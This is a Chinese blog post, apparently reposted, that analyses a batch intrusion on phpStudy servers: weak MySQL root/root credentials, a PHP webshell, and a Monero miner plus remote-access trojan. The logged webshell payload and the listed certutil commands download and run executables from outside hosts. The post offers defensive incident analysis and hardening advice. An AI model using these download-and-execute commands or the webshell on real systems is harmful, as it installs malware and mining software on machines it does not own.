针对phpStudy网站服务器的入侵
今天客户服务器上出现报警,查找了下原因,发现根目录下有wk.php
E:\phpStudy\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with: TCP Port: 3306, Named Pipe: MySQL Time Id Command Argument2173 Quit 190207 18:31:59 2174 Connect root@localhost on 2174 Query SET NAMES 'utf8' COLLATE 'utf8_general_ci'2174 Init DB mysql2174 Init DB mysql2174 Query SELECT '<?php @system("certutil.exe -urlcache -split -f http://m4.rui2.net/upload/12/2016/10/wk.exe");@phpinfo();@system("certutil.exe -urlcache -split -f http://14.29.194.121:22/server_sql.php");@sleep(2);@system('wk.exe');?>'2174 Query SHOW VARIABLES LIKE 'language'2174 Quit 190207 18:32:00 2175 Connect root@localhost on 2175 Query SET NAMES 'utf8' COLLATE 'utf8_general_ci'2175 Init DB mysql2175 Init DB mysql2175 Query set global general_log='off'
查了下原因,是针对phpStudy网站服务器进行批量入侵的挖矿木马
攻击者对互联网上的服务器进行批量扫描,发现易受攻击的phpStudy系统后,利用用户在安装时未进行修改的MySQL弱密码进行登录,并进一步植入WebShell,然后通过shell下载挖矿木马挖门罗币。
中招主机通过phpStudy一键部署PHP环境,默认情况下包含phpinfo及phpMyAdmin并且任何人都可以访问,同时安装的MySQL默认口令为弱口令密码root/root,且开启在外网3306端口,在未设置安全组或者安全组为放通全端口的情况下,受到攻击者对于phpStudy的针对性探测,并且暴露了其MySQL弱口令。
特点:
(1)都是通过探测phpStudy搭建的php环境进行攻击
(2)通过webshell植入挖矿木马时,白利用certutil.exe
命令1
certutil.exe -urlcache -split -f http://down.ctosus.ru/wkinstall.exe &wkinstall.exe &del wkinstall.exe
命令2
certutil.exe -urlcache -split -f http://m4.rui2.net/upload/12/2016/10/wk.exe &wk.exe
(3)挖矿木马通过bat脚本启动,且矿机采用xmr-stak挖矿工具
(4)在挖矿的同时植入大灰狼远控木马
安全建议:
(1)修复系统漏洞
(2)集成环境,在安装结束后应及时修改MySQL密码为强密码,最低密码长度不要低于11位,组合最好是字母数字和符号;删除l.php(探针文件),避免被黑客探测入侵
(3)增加安全策略
参考:https://s.tencent.com/research/report/642.html
转载于:https://www.cnblogs.com/baby123/p/10430445.html
针对phpStudy网站服务器的入侵相关推荐
- 网站服务器如何防护攻击?网站服务器被挂马如何检测
网站服务器是指安装在互联网上的服务器,主要用于提供网站服务.由于网站服务器的重要性,它也是攻击者的活动焦点,因此如何防护攻击就显得尤为重要.本文将分析网站服务器是如何被攻击的以及如何防护攻击. 网站服 ...
- 记我一次成功的入侵学校网站服务器的黑客行动
声明:根据网上某黑客故事改编 这是我当黑客以来接到的最具挑战性的一单生意,那就是去黑学校网站的服务器.工欲善其事,必先利其器,我很明白现今装备的重要性,于是我把自己从头武装到脚,包装上了全黑的紧身夜行 ...
- 服务器php网站配置域名访问,phpstudy在服务器上配置域名
phpstudy在服务器上配置域名 内容精选 换一换 可以.一个服务器上可以同时配置多个证书.证书是与域名或IP绑定的,对服务器的数量没有限制.如果您购买的证书绑定的域名用于多台服务器,则购买的证书需 ...
- 2023版D盾防火墙v2.1.7.2,主动防御保护,以内外保护的方式 防止网站和服务器给入侵。限制了常见的入侵方法,让服务器更安全
v2.1.7.2 (20230107) 2023-1-7 1.修正PHP一处文件检测的bug. 2.修正某些情况下无法文件加白问题. v2.1.7.2 2022-10-13 1.针对aspx的样本加入 ...
- phpstudy服务器站点,服务器中phpstudy网站部署详解
导读:服务器中phpstudy网站部署详解 phpstudy是一款比较优质的建站软件,上面搭载了Apache+iis+mysql等多个网站环境,而且可以自由切换到所需版本,对于需要部署复杂环境的网站, ...
- 服务器被黑 追寻ip_网站服务器被攻击了如何查找木马(webshell)IP 篡改的痕迹...
很对客户网站以及服务器被攻击,被黑后,留下了很多webshell文件,也叫网站木马文件,客户对自己网站的安全也是很担忧,担心网站后期会继续被攻击篡改,毕竟没有专业的安全技术去负责网站的安全防护工作,通 ...
- 关于服务器被入侵+植入病毒木马
近期项目中遇到了几个棘手的问题,海外服务器被植入木马病毒程序.之前一直听说xxx的服务器被入侵,这次实打实遇到,还是没有做好安全防护策略 目录 1.木马病毒侵入系统 2.发现入侵病毒+木马 3.定位木 ...
- 杀毒软件 防火墙 PHPIDS打造php网站服务器三位一体宙斯盾安防
张智翔 杀毒软件防火墙PHPIDS打造php网站服务器三位一体宙斯盾安防 只要要发布信息到外网,就不可避免的碰到入侵与嗅探,环眼扫去,安全事故层出不穷,尤其php在web服务器这一块的巨大市场,如何打 ...
- Linux服务器被入侵之后的处理方法
安全事件处理流程 如上图,将服务器安全应急响应流程分为如下 8 个环节: 发现安全事件(核实)-现场保护–服务器保护-影响范围评估-在线分析-数据备份-深入分析----事件报告整理 各阶段说明 核实信 ...
最新文章
- python环境设置_CentOS 7.2环境搭建实录(第四章:python环境配置)
- Service Mesh是大方向,那Database Mesh呢?
- HTTP中Accept与Content-Type区别
- 【数据集】一文道尽医学图像数据集与竞赛
- python中自定义变量名标识符_name是python的标识符吗
- python进程监控及恢复
- android中文离线api_比林肯法球Linken sphere浏览器更多更新指纹的国产防关联软件-VMLogin中文版浏览器...
- CentOS发行版本介绍
- 计算机类实训室建设公司,计算机专业实训室建设方案修改
- #VSTS日志# Xamarin构建支持和一大波更新
- 使用wps插件,实现word转PDF
- 关于计算机应用的论文题目是什么,计算机应用技术专业毕业论文题目
- ROS做端口映射DDNS的N个做法详细教程
- 18. shell当中的until,until语法,无限循环,until示例
- 教你制作在线签名 【电驴技巧,转verycd】
- 2021-08-29 网安实验-网络协议栈渗透测试之DDOS攻击之CC攻击
- 计算机内存国产,拼多多上买的纯国产内存条会不会翻车?雷赤 内存条评测
- 【转】死链-百度百科
- [人生感悟]在平凡中蜕变,我的2014
- 余淼杰老师 经济学原理复习笔记(微观)